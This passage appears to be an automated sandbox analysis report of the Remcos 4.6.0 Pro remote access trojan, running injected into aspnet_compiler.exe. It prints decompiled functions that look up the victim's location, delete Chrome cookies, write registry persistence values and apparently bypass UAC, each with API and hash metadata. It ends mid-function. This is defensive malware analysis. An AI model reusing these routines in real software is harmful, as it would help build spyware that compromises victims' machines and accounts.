                					return _t14;
                				}
                				 *((intOrPtr*)(E0043EEAD())) = 0x16;
                				E0043A5BB();
                				return 0;
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21f379037bd41000b1dec86829ff5a907d8c929fa96bc8a1dddedb872b7e1145
                • Instruction ID: 243b992db74428a8b8f40e07f5805634c7787d5acd7d10a8c2111fadf3c51f9b
                • Opcode Fuzzy Hash: 21f379037bd41000b1dec86829ff5a907d8c929fa96bc8a1dddedb872b7e1145
                • Instruction Fuzzy Hash: A6112731505605BBDB102F779C0597B3BA9EF86336B11066AFC11C7252EA38C8459269
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00419EDB(void* __ecx, void* __edx) {
                				WCHAR* _v36;
                				long _v80;
                				char _v88;
                				int _v92;
                				intOrPtr _v96;
                				void* _v100;
                				int _v104;
                				intOrPtr _v108;
                				void* __ebx;
                				void* __ebp;
                				int _t16;
                				void* _t24;
                				intOrPtr _t27;
                				void* _t32;
                				void* _t33;
                				void* _t35;
                				void* _t37;
                
                				_t32 = __edx;
                				_t25 = __ecx;
                				_t24 = __ecx;
                				E004020BF(__ecx, __ecx);
                				_push(0xffff);
                				_v36 = 0;
                				_t33 = E0043A620(_t25);
                				_t37 = InternetOpenW(0, 1, 0, 0, 0);
                				_t35 = InternetOpenUrlW(_t37, L"http://geoplugin.net/json.gp", 0, 0, 0x80000000, 0);
                				do {
                					_v80 = _v80 & 0x00000000;
                					_t16 = InternetReadFile(_t35, _t33, 0xffff,  &_v80);
                					_t27 = _v96;
                					_v92 = _t16;
                					_t40 = _t27;
                					if(_t27 != 0) {
                						L00403356(E00402097(_t24,  &_v88, _t32, _t37, _t40, _t33, _t27));
                						E00401FB8();
                						_t27 = _v108;
                						_t16 = _v104;
                					}
                				} while (_t16 == 1 && _t27 != 0);
                				InternetCloseHandle(_t35);
                				InternetCloseHandle(_t37);
                				L0043A61B(_t33);
                				return _t24;
                			}

                APIs
                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419F02
                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 00419F18
                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 00419F31
                • InternetCloseHandle.WININET(00000000), ref: 00419F77
                • InternetCloseHandle.WININET(00000000), ref: 00419F7A
                Strings
                • http://geoplugin.net/json.gp, xrefs: 00419F12
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Internet$CloseHandleOpen$FileRead
                • String ID: http://geoplugin.net/json.gp
                • API String ID: 3121278467-91888290
                • Opcode ID: 2a2d18a2d1326e2a0acf09f31c35e5c691ed8eb435983273dc7f527a5ef05663
                • Instruction ID: a70ecc99465d7097496f885b09ad11ab3779813296453655fb12c4e4d745da0f
                • Opcode Fuzzy Hash: 2a2d18a2d1326e2a0acf09f31c35e5c691ed8eb435983273dc7f527a5ef05663
                • Instruction Fuzzy Hash: FD11C8311093127BD224AB169C49DBF7F9CEF86765F00043EF945E2291DB68DC45C6BA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0041AD6A(long __edx, WCHAR* _a4, long _a8) {
                				long _v4;
                				intOrPtr _t8;
                				long _t9;
                				struct _OVERLAPPED* _t19;
                				void* _t20;
                				long _t21;
                				long _t23;
                				void* _t24;
                				void* _t25;
                
                				_t1 =  &_a8; // 0x465028
                				_t19 = 0;
                				_t25 = _t20;
                				_t23 = __edx;
                				_t8 =  *_t1;
                				if(_t8 == 0) {
                					_t9 = 0x40000000;
                					_t21 = 2;
                				} else {
                					if(_t8 != 1) {
                						_t9 = _a8;
                						_t21 = _a8;
                					} else {
                						_t9 = 4;
                						_t21 = _t9;
                					}
                				}
                				_t24 = CreateFileW(_a4, _t9, _t19, _t19, _t21, 0x80, _t19);
                				if(_t24 != 0xffffffff) {
                					if(_a8 != 1 || SetFilePointer(_t24, _t19, _t19, 2) != 0xffffffff) {
                						if(WriteFile(_t24, _t25, _t23,  &_v4, _t19) != 0) {
                							_t19 = 1;
                						}
                						CloseHandle(_t24);
                						return _t19;
                					} else {
                						CloseHandle(_t24);
                						goto L6;
                					}
                				} else {
                					L6:
                					return 0;
                				}
                			}

                APIs
                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0046A8F0,00000000,00000000,0040C902,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041ADA9
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041ADC6
                • CloseHandle.KERNEL32(00000000), ref: 0041ADD2
                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041ADE3
                • CloseHandle.KERNEL32(00000000), ref: 0041ADF0
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseHandle$CreatePointerWrite
                • String ID: (PF
                • API String ID: 1852769593-3961223099
                • Opcode ID: bf69a830dd746d7c6ae827066bb4a5dedd865cc1e8c81bdcf7b86caaf748b986
                • Instruction ID: 53714e6fa216203b7318fdbd75d04b9937c0d47cb555b8ec8e0bf6eb367397e8
                • Opcode Fuzzy Hash: bf69a830dd746d7c6ae827066bb4a5dedd865cc1e8c81bdcf7b86caaf748b986
                • Instruction Fuzzy Hash: CE110871206A117FE6104A24BC88EFB779EEB42367F10463AF552C26D0C634CC86563F
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0044F77A(intOrPtr _a4) {
                				void* _t18;
                
                				_t45 = _a4;
                				if(_a4 != 0) {
                					E0044F4C1(_t45, 7);
                					E0044F4C1(_t45 + 0x1c, 7);
                					E0044F4C1(_t45 + 0x38, 0xc);
                					E0044F4C1(_t45 + 0x68, 0xc);
                					E0044F4C1(_t45 + 0x98, 2);
                					E00445002( *((intOrPtr*)(_t45 + 0xa0)));
                					E00445002( *((intOrPtr*)(_t45 + 0xa4)));
                					E00445002( *((intOrPtr*)(_t45 + 0xa8)));
                					E0044F4C1(_t45 + 0xb4, 7);
                					E0044F4C1(_t45 + 0xd0, 7);
                					E0044F4C1(_t45 + 0xec, 0xc);
                					E0044F4C1(_t45 + 0x11c, 0xc);
                					E0044F4C1(_t45 + 0x14c, 2);
                					E00445002( *((intOrPtr*)(_t45 + 0x154)));
                					E00445002( *((intOrPtr*)(_t45 + 0x158)));
                					E00445002( *((intOrPtr*)(_t45 + 0x15c)));
                					return E00445002( *((intOrPtr*)(_t45 + 0x160)));
                				}
                				return _t18;
                			}

                APIs
                  • Part of subcall function 0044F4C1: _free.LIBCMT ref: 0044F4EA
                • _free.LIBCMT ref: 0044F7C8
                  • Part of subcall function 00445002: HeapFree.KERNEL32(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                  • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                • _free.LIBCMT ref: 0044F7D3
                • _free.LIBCMT ref: 0044F7DE
                • _free.LIBCMT ref: 0044F832
                • _free.LIBCMT ref: 0044F83D
                • _free.LIBCMT ref: 0044F848
                • _free.LIBCMT ref: 0044F853
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                • Instruction ID: e20f7d93c4c1b7366c41c1c89a5bca39aa981d096f5eec7d46ef9b7b16274198
                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                • Instruction Fuzzy Hash: C7117F71540B54AAEA30BBB2CC47FCF779C9F50708F81492FB39DA6052EA2CB5188794
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E004106A6(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                				void* _v8;
                				char _v12;
                				char _v24;
                				intOrPtr _v36;
                				intOrPtr* _t34;
                				void* _t39;
                				intOrPtr* _t42;
                				intOrPtr* _t44;
                
                				E00433BCB( &_v12, 0);
                				_t39 =  *0x474a78;
                				_v8 = _t39;
                				_t42 = E0040D696(_a4, E0040D5C5(0x474c68));
                				if(_t42 != 0) {
                					L5:
                					E00433C23( &_v12);
                					return _t42;
                				} else {
                					if(_t39 == 0) {
                						__eflags = E0041076A(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                						if(__eflags == 0) {
                							_t34 =  &_v24;
                							E0040D491(_t34);
                							E004379F6( &_v24, 0x46cd4c);
                							asm("int3");
                							_push(_t42);
                							_t44 = _t34;
                							E0040D38B(_t34, _v36);
                							 *_t44 = 0x4582f4;
                							return _t44;
                						} else {
                							_t42 = _v8;
                							 *0x474a78 = _t42;
                							 *((intOrPtr*)( *_t42 + 4))();
                							E00433DDC(__eflags, _t42);
                							goto L5;
                						}
                					} else {
                						_t42 = _t39;
                						goto L5;
                					}
                				}
                			}

                APIs
                • std::_Lockit::_Lockit.LIBCPMT ref: 004106B3
                • int.LIBCPMT ref: 004106C6
                  • Part of subcall function 0040D5C5: std::_Lockit::_Lockit.LIBCPMT ref: 0040D5D6
                  • Part of subcall function 0040D5C5: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D5F0
                • std::_Facet_Register.LIBCPMT ref: 00410706
                • std::_Lockit::~_Lockit.LIBCPMT ref: 0041070F
                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041072D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                • String ID: hLG
                • API String ID: 2536120697-233936816
                • Opcode ID: fe1dd14917883f67ba224efd1dee7036d7affe31d0fcfbb40d479355fe81f6d9
                • Instruction ID: 7c3c20e224a2a00f7f7be6237b00d9c90688f6040d3be4d1753458cdbc359952
                • Opcode Fuzzy Hash: fe1dd14917883f67ba224efd1dee7036d7affe31d0fcfbb40d479355fe81f6d9
                • Instruction Fuzzy Hash: 96110A32900218ABCB11FBE5C8418DEBB689F84724F11056FF815672D1DF78AE85CBD8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00438C57(void* __ecx) {
                				void* _t4;
                				void* _t11;
                				void* _t16;
                				long _t25;
                				void* _t28;
                
                				if( *0x46f090 != 0xffffffff) {
                					_t25 = GetLastError();
                					_t11 = E004376D8(__eflags,  *0x46f090);
                					__eflags = _t11 - 0xffffffff;
                					if(_t11 == 0xffffffff) {
                						L5:
                						_t11 = 0;
                					} else {
                						__eflags = _t11;
                						if(__eflags == 0) {
                							_t4 = E00437712(__eflags,  *0x46f090, 0xffffffff);
                							_pop(_t16);
                							__eflags = _t4;
                							if(_t4 != 0) {
                								_t28 = E004443F4(_t16, 1, 0x28);
                								__eflags = _t28;
                								if(__eflags == 0) {
                									L8:
                									_t11 = 0;
                									E00437712(__eflags,  *0x46f090, 0);
                								} else {
                									__eflags = E00437712(__eflags,  *0x46f090, _t28);
                									if(__eflags != 0) {
                										_t11 = _t28;
                										_t28 = 0;
                										__eflags = 0;
                									} else {
                										goto L8;
                									}
                								}
                								E00445002(_t28);
                							} else {
                								goto L5;
                							}
                						}
                					}
                					SetLastError(_t25);
                					return _t11;
                				} else {
                					return 0;
                				}
                			}

                APIs
                • GetLastError.KERNEL32(?,?,00438C4E,00437B8E), ref: 00438C65
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438C73
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00438C8C
                • SetLastError.KERNEL32(00000000,?,00438C4E,00437B8E), ref: 00438CDE
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: 06d2b6d0d256db09040b2198e32479e012de82d5718a97fd6b90c10f44b40caa
                • Instruction ID: 21f9491cf859890c7eadaa784ea30681ac294a37727d4d336c6cdb78a7d4fc19
                • Opcode Fuzzy Hash: 06d2b6d0d256db09040b2198e32479e012de82d5718a97fd6b90c10f44b40caa
                • Instruction Fuzzy Hash: 7001F73220E7126FE6242B797C86A2B6744DB09779F20323FF624456E2FF594C09726D
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406C44
                  • Part of subcall function 00406B71: _wcslen.LIBCMT ref: 00406B95
                  • Part of subcall function 00406B71: CoGetObject.OLE32(?,00000024,004644E0,00000000), ref: 00406BF6
                • CoUninitialize.OLE32 ref: 00406C9D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: InitializeObjectUninitialize_wcslen
                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                • API String ID: 3851391207-1062857032
                • Opcode ID: 21c6875a4e00bf3e9cd9c84db11fc7adaedb877f72474f7b3962a236dd4ca43a
                • Instruction ID: 4a2b0e9ada28304c15679dea14e35c8bbb0126878905a56f40071f2f2dcd1631
                • Opcode Fuzzy Hash: 21c6875a4e00bf3e9cd9c84db11fc7adaedb877f72474f7b3962a236dd4ca43a
                • Instruction Fuzzy Hash: 5D01C0723093116FF7246B52EC0AF3B7798DB8176AF16013FF946A61C1EAB9EC004169
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E0040B01B(void* __edx, void* __edi, void* __eflags) {
                				char _v28;
                				char _v52;
                				void* __ebx;
                				void* __ebp;
                				long _t18;
                				void* _t20;
                				void* _t21;
                				void* _t28;
                				void* _t32;
                				void* _t33;
                				void* _t34;
                
                				_t37 = __eflags;
                				_t32 = __edi;
                				_t31 = E00402073(_t20,  &_v52, __edx, _t33, E0043A9AA(_t20, __eflags, "UserProfile"));
                				E00408832(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                				E00401FB8();
                				if(DeleteFileA(E00401F8B( &_v28)) != 0) {
                					_t28 = _t34 - 0x18;
                					_push("\n[Chrome Cookies found, cleared!]");
                					goto L6;
                				} else {
                					_t18 = GetLastError();
                					if(_t18 == 0 || _t18 == 1) {
                						_t28 = _t34 - 0x18;
                						_push("\n[Chrome Cookies not found]");
                						L6:
                						E00402073(_t20, _t28, _t31, _t33);
                						E0040B752(_t20, _t31, _t33, __eflags);
                						_t21 = 1;
                					} else {
                						_t21 = 0;
                					}
                				}
                				E00401FB8();
                				return _t21;
                			}

                APIs
                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B057
                • GetLastError.KERNEL32 ref: 0040B061
                Strings
                • [Chrome Cookies found, cleared!], xrefs: 0040B087
                • [Chrome Cookies not found], xrefs: 0040B07B
                • UserProfile, xrefs: 0040B027
                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B022
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: DeleteErrorFileLast
                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                • API String ID: 2018770650-304995407
                • Opcode ID: ccdb3e1c20e372875c48605d81a56ec54d8c08013769e4607f37cdedbea4537f
                • Instruction ID: f9fbcf48e46e0b37629b78e1018d25b522eb7a253e11c313dbfba25adce049df
                • Opcode Fuzzy Hash: ccdb3e1c20e372875c48605d81a56ec54d8c08013769e4607f37cdedbea4537f
                • Instruction Fuzzy Hash: FE01F271AC410666CA0476B5DD5BCBFBB28E951308B40027FF842721E2FF7A490586CF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 70%
                			E0041B6A6(void* __ebx, void* __ecx, void* __edx, void* __edi) {
                				char _v104;
                				struct HWND__* _t7;
                				void* _t24;
                				void* _t28;
                
                				_t28 = __edi;
                				_t26 = __ecx;
                				_t24 = __ecx;
                				AllocConsole();
                				_t7 =  *0x472b0c(__ebx);
                				_t32 = _t24;
                				 *0x472b10 = _t7;
                				if(_t24 == 0) {
                					ShowWindow(_t7, 0);
                				}
                				E004404F2(_t26, "CONOUT$", "a", E0043AA88(1));
                				SetConsoleOutputCP(0x4e4);
                				E0041B663();
                				E00435760(_t28,  &_v104, 0, 0x64);
                				E00440830( &_v104, "\n\tRemcos v");
                				E00440830( &_v104, "4.6.0 Pro");
                				E00440830( &_v104, 0x46ae58);
                				_push( &_v104);
                				return E00406874(_t32);
                			}

                APIs
                • AllocConsole.KERNEL32(00473280), ref: 0041B6AF
                • ShowWindow.USER32(00000000,00000000), ref: 0041B6C8
                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041B6ED
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Console$AllocOutputShowWindow
                • String ID: Remcos v$4.6.0 Pro$CONOUT$
                • API String ID: 2425139147-579393372
                • Opcode ID: 9fa98f7035d97c5e21b7ac84947d6802447a46aa1252a65f1097801335382c61
                • Instruction ID: db7634a49a328e0f99b2c2d62409033857a76ccc0adaf027dd828388b15aa78f
                • Opcode Fuzzy Hash: 9fa98f7035d97c5e21b7ac84947d6802447a46aa1252a65f1097801335382c61
                • Instruction Fuzzy Hash: B1012171A903086BE600FBB19D4BF9D33ACAB14705F501427B604A7192EABD9924CA6E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004068D4(void* __esi) {
                				int _t5;
                				void* _t7;
                				void* _t8;
                				void* _t13;
                				void* _t20;
                
                				_t20 =  *0x46f9d0 - 1; // 0x1
                				if(_t20 != 0) {
                					__eflags =  *0x46f9d0 - 1;
                					if(__eflags != 0) {
                						CloseHandle( *0x470d44);
                						__eflags = E00406E2B(__eflags);
                						if(__eflags == 0) {
                							_t13 = 0x470b38;
                						} else {
                							_t13 = E00401EE4(0x473220);
                						}
                						_t5 = E00406CE1(_t13, 0x46a8f0, __eflags);
                						__eflags = _t5;
                						if(_t5 == 0) {
                							ExitProcess(_t5);
                						}
                						_t7 = CreateMutexA(0, 1, E00401F8B(0x473268));
                						 *0x470d44 = _t7;
                						_t8 = 2;
                						return _t8;
                					} else {
                						__eflags = 1;
                						return 1;
                					}
                				} else {
                					return 1;
                				}
                			}

                Strings
                • h2G, xrefs: 00406D4E
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, xrefs: 00406D38
                • 2G, xrefs: 00406D18
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 2G$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$h2G
                • API String ID: 0-4004919476
                • Opcode ID: c61ca4cb01cddf5c13da32d6100223f6d0b8265b2d1e1a0c3ddc6a0d86cef2f3
                • Instruction ID: 7dfc231a9bb00e149e5c0c7810f67d20ab7eac2a910a21db205252ecd238aa05
                • Opcode Fuzzy Hash: c61ca4cb01cddf5c13da32d6100223f6d0b8265b2d1e1a0c3ddc6a0d86cef2f3
                • Instruction Fuzzy Hash: AEF0F670706311EBDB102B70AD0926A2616EB40306F01447BF84BEA2E1EB7D8852965E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00412AFC(void* __ecx, short* __edx, short* _a4, char _a8) {
                				void* _v8;
                				signed int _t16;
                				char* _t18;
                				long _t19;
                				signed int _t21;
                				signed int _t22;
                
                				_push(__ecx);
                				_push(_t21);
                				_t1 =  &_v8; // 0x473220
                				if(RegCreateKeyW(__ecx, __edx, _t1) != 0) {
                					_t22 = 0;
                				} else {
                					_t16 = E0040245C();
                					_t3 =  &_a8; // 0x40ed66
                					_t18 = E00401EE4(_t3);
                					_t7 =  &_v8; // 0x473220
                					_t19 = RegSetValueExW( *_t7, _a4, 0, 1, _t18, 2 + _t16 * 2);
                					RegCloseKey(_v8);
                					_t22 = _t21 & 0xffffff00 | _t19 == 0x00000000;
                				}
                				E00401EE9();
                				return _t22;
                			}

                APIs
                • RegCreateKeyW.ADVAPI32(80000001,00000000, 2G), ref: 00412B07
                • RegSetValueExW.ADVAPI32( 2G,?,00000000,00000001,00000000,00000000,00473238,?,0040ED66,pth_unenc,00473220), ref: 00412B35
                • RegCloseKey.ADVAPI32(?,?,0040ED66,pth_unenc,00473220), ref: 00412B40
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateValue
                • String ID: 2G$f@$pth_unenc
                • API String ID: 1818849710-3782201451
                • Opcode ID: 6190462d4d81e4473ec81c7f4ed76fee2d9c5a76ef708f5cda19a85617608406
                • Instruction ID: 0c8d3bccce686eec099df141ad345258a3ef415a4a3ae97405fd51eab9751fc6
                • Opcode Fuzzy Hash: 6190462d4d81e4473ec81c7f4ed76fee2d9c5a76ef708f5cda19a85617608406
                • Instruction Fuzzy Hash: 1CF0C231444218BBCF009FA1ED86FEE37ACEB00754F00412AB805A61A1E6759E04DA94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E004393DC(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
                				intOrPtr _v0;
                				char _v8;
                				signed int _v12;
                				char _v16;
                				signed int _v20;
                				char _v24;
                				void* __esi;
                				void* __ebp;
                				signed int _t61;
                				void* _t64;
                				signed int _t67;
                				signed int _t69;
                				signed int _t70;
                				signed int _t73;
                				signed int _t75;
                				signed int _t77;
                				signed int _t78;
                				intOrPtr _t80;
                				signed int _t81;
                				void* _t82;
                				signed int _t84;
                				void* _t85;
                				signed int _t87;
                				signed int _t93;
                				signed int _t102;
                				void* _t104;
                				signed int _t107;
                				signed int* _t110;
                				signed int* _t111;
                				intOrPtr* _t113;
                				signed int _t118;
                				signed int _t120;
                				signed int _t123;
                				void* _t125;
                				signed int _t128;
                				signed int _t131;
                				signed int _t139;
                				signed int _t145;
                				void _t147;
                				void* _t148;
                				void* _t150;
                				void* _t152;
                				signed int _t153;
                				signed int _t154;
                				void* _t155;
                				signed int _t156;
                				signed int _t157;
                				signed int _t158;
                				intOrPtr _t159;
                
                				_t139 = __edx;
                				_t155 = _a4;
                				if(_t155 == 0) {
                					_t113 = E0043EEAD();
                					_t159 = 0x16;
                					 *_t113 = _t159;
                					E0043A5BB();
                					return _t159;
                				}
                				_push(__edi);
                				_t123 = 9;
                				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
                				_t145 = _a8;
                				__eflags = _t145;
                				if(_t145 == 0) {
                					_t111 = E0043EEAD();
                					_t158 = 0x16;
                					 *_t111 = _t158;
                					E0043A5BB();
                					_t78 = _t158;
                					L12:
                					return _t78;
                				}
                				_push(__ebx);
                				__eflags =  *(_t145 + 4);
                				if(__eflags <= 0) {
                					if(__eflags < 0) {
                						L10:
                						_t110 = E0043EEAD();
                						_t157 = 0x16;
                						 *_t110 = _t157;
                						_t78 = _t157;
                						L11:
                						goto L12;
                					}
                					__eflags =  *_t145;
                					if( *_t145 < 0) {
                						goto L10;
                					}
                				}
                				_t64 = 7;
                				__eflags =  *(_t145 + 4) - _t64;
                				if(__eflags >= 0) {
                					if(__eflags > 0) {
                						goto L10;
                					}
                					__eflags =  *_t145 - 0x93406fff;
                					if(__eflags > 0) {
                						goto L10;
                					}
                				}
                				E00447E20(0, _t145, _t155, __eflags);
                				_v12 = 0;
                				_v16 = 0;
                				_v8 = 0;
                				_t67 = E00447655( &_v12);
                				_pop(_t125);
                				__eflags = _t67;
                				if(_t67 == 0) {
                					_t75 = E00447681( &_v16);
                					_pop(_t125);
                					__eflags = _t75;
                					if(_t75 == 0) {
                						_t77 = E004476AD( &_v8);
                						_pop(_t125);
                						__eflags = _t77;
                						if(_t77 == 0) {
                							_t118 =  *(_t145 + 4);
                							_t128 =  *_t145;
                							__eflags = _t118;
                							if(__eflags < 0) {
                								L28:
                								_push(_t145);
                								_push(_t155);
                								_t78 = E00441327();
                								__eflags = _t78;
                								if(_t78 != 0) {
                									goto L11;
                								}
                								__eflags = _v12;
                								asm("cdq");
                								_t147 =  *_t155;
                								_t120 = _t139;
                								if(__eflags == 0) {
                									L32:
                									_t80 = _v8;
                									L33:
                									asm("cdq");
                									_t148 = _t147 - _t80;
                									asm("sbb ebx, edx");
                									_t81 = E00455EF0(_t148, _t120, 0x3c, 0);
                									 *_t155 = _t81;
                									__eflags = _t81;
                									if(_t81 < 0) {
                										_t148 = _t148 + 0xffffffc4;
                										 *_t155 = _t81 + 0x3c;
                										asm("adc ebx, 0xffffffff");
                									}
                									_t82 = E00455E40(_t148, _t120, 0x3c, 0);
                									_t121 = _t139;
                									_t28 = _t155 + 4; // 0x848d0046
                									asm("cdq");
                									_t150 = _t82 +  *_t28;
                									asm("adc ebx, edx");
                									_t84 = E00455EF0(_t150, _t139, 0x3c, 0);
                									 *(_t155 + 4) = _t84;
                									__eflags = _t84;
                									if(_t84 < 0) {
                										_t150 = _t150 + 0xffffffc4;
                										 *(_t155 + 4) = _t84 + 0x3c;
                										asm("adc ebx, 0xffffffff");
                									}
                									_t85 = E00455E40(_t150, _t121, 0x3c, 0);
                									_t122 = _t139;
                									_t31 = _t155 + 8; // 0xa824
                									asm("cdq");
                									_t152 = _t85 +  *_t31;
                									asm("adc ebx, edx");
                									_t87 = E00455EF0(_t152, _t139, 0x18, 0);
                									 *(_t155 + 8) = _t87;
                									__eflags = _t87;
                									if(_t87 < 0) {
                										_t152 = _t152 + 0xffffffe8;
                										 *(_t155 + 8) = _t87 + 0x18;
                										asm("adc ebx, 0xffffffff");
                									}
                									_t131 = E00455E40(_t152, _t122, 0x18, 0);
                									__eflags = _t139;
                									if(__eflags < 0) {
                										L48:
                										_t44 = _t155 + 0x18; // 0xa024848d
                										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
                										asm("cdq");
                										_t153 = 7;
                										_t51 = _t155 + 0xc; // 0x50506a00
                										_t93 =  *_t51;
                										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
                										__eflags = _t93;
                										if(_t93 > 0) {
                											goto L43;
                										}
                										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
                										 *(_t155 + 0xc) = _t93 + 0x1f;
                										_t55 = _t131 + 0x16d; // 0x16d
                										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
                										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
                										goto L44;
                									} else {
                										if(__eflags > 0) {
                											L42:
                											_t34 = _t155 + 0x18; // 0xa024848d
                											asm("cdq");
                											_t154 = 7;
                											_t39 = _t155 + 0xc;
                											 *_t39 =  *(_t155 + 0xc) + _t131;
                											__eflags =  *_t39;
                											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
                											L43:
                											_t42 = _t155 + 0x1c;
                											 *_t42 =  *(_t155 + 0x1c) + _t131;
                											__eflags =  *_t42;
                											L44:
                											_t78 = 0;
                											goto L11;
                										}
                										__eflags = _t131;
                										if(_t131 == 0) {
